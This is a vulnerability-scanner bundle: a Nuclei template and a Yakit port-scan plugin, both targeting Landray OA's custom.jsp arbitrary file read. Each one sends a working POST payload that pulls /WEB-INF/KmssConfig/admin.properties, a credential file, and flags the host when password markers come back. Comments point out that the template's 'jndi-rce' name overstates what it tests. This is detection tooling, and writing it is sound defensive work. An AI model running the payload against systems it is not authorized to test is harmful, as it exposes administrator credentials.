landray-oa-admin-do-jndi-rce
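# NOTE(review): despite the id/name/tag (jndi-rce), this template exercises the
# custom.jsp arbitrary-file-read step only: it requests admin.properties and
# matches on "password" / "kmss.properties.encrypt.enabled". A hit is confirmed
# file disclosure; the JNDI/RCE part of the referenced chain is not verified here,
# so triage it separately. The matched response carries credential material —
# store or redact findings accordingly.
id: landray-oa-admin-do-jndi-rce

info:
  name: Landray-OA-admin-do-jndi-rce
  author: 你是猪
  severity: high
  reference:
    - http://wiki.peiqi.tech/wiki/oa/%E8%93%9D%E5%87%8COA/%E8%93%9D%E5%87%8COA%20admin.do%20JNDI%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C.html
  metadata:
    fofa-query: app="Landray-OA系统"
  tags: landray,rce

requests:
  - raw:
      - |
        POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
        Host: {{Hostname}}
        Accept: */*
        Content-Type: application/x-www-form-urlencoded

        var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}

    stop-at-first-match: true
    # Both the word matcher (both markers required) and a 200 status must hold.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "password"
          - "kmss.properties.encrypt.enabled"
        condition: and

      - type: status
        status:
          - 200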
Port scan plugin (Yak script)
// Attach to the Yakit runtime before the yakit.* / risk.* calls below are made.
yakit.AutoInitYakit()
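// handleCheck sends the custom.jsp file-read probe to target:port and, when the
// response carries both admin.properties markers, logs the finding and records a
// high-severity risk. Nothing is returned; output goes to yakit.Info / risk.NewRisk.
//
// target: host or IP from the port-scan result; port: the open port.
handleCheck = func(target, port) {
    addr = str.HostPort(target, port)
    isTls = str.IsTLSServer(addr)

    // Raw probe; {{params(target)}} is filled from poc.params below.
    // Content-Length 60 matches the fixed body exactly.
    packet = `POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: {{params(target)}}
User-Agent: Go-http-client/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

var={"body":{"file":"/WEB-INF/KmssConfig/admin.properties"}}
`
    rsp, req, err = poc.HTTP(
        packet,
        poc.params({"target": addr}),
        poc.https(isTls),
        poc.redirectTimes(0),
    )
    // Report transport errors instead of dropping them, so an unreachable or
    // timed-out host is not silently mistaken for "not vulnerable".
    if err != nil {
        yakit.Info("%v request failed: %v", addr, err)
        return
    }
    // dump(rsp)
    if len(rsp) == 0 {
        return
    }
    // Both markers must be present. Unlike the YAML template there is no
    // status-code check here; only the response content decides.
    if !str.MatchAllOfSubString(rsp, "password", "kmss.properties.encrypt.enabled") {
        return
    }

    yakit.Info("%v found 蓝凌OA custom.jsp 任意文件读取漏洞", addr)
    // NOTE: the stored response is the disclosed admin.properties content
    // (credential material); handle exported risk records accordingly.
    risk.NewRisk(
        addr,
        risk.title("蓝凌OA custom.jsp 任意文件读取漏洞"),
        risk.severity("high"),
        risk.titleVerbose("蓝凌OA custom.jsp 任意文件读取漏洞"),
        risk.type("蓝凌OA"),
        risk.details({
            "target":   addr,
            "request":  req,
            "response": rsp,
        }),
    )
    return
}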
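// handle is the port-scan callback: it runs the probe only for ports that are
// open and have at least one HTTP flow in their fingerprint.
//
// As pasted, the `if !result.IsOpen()` guard sat on the same line as the
// "handle match result" comment and was therefore commented out; it is
// restored here on its own line.
handle = func(result /* *fp.MatchResult */) {
    // handle match result
    if !result.IsOpen() {
        return
    }
    if len(result.Fingerprint.HttpFlows) == 0 {
        return
    }
    handleCheck(result.Target, result.Port)
}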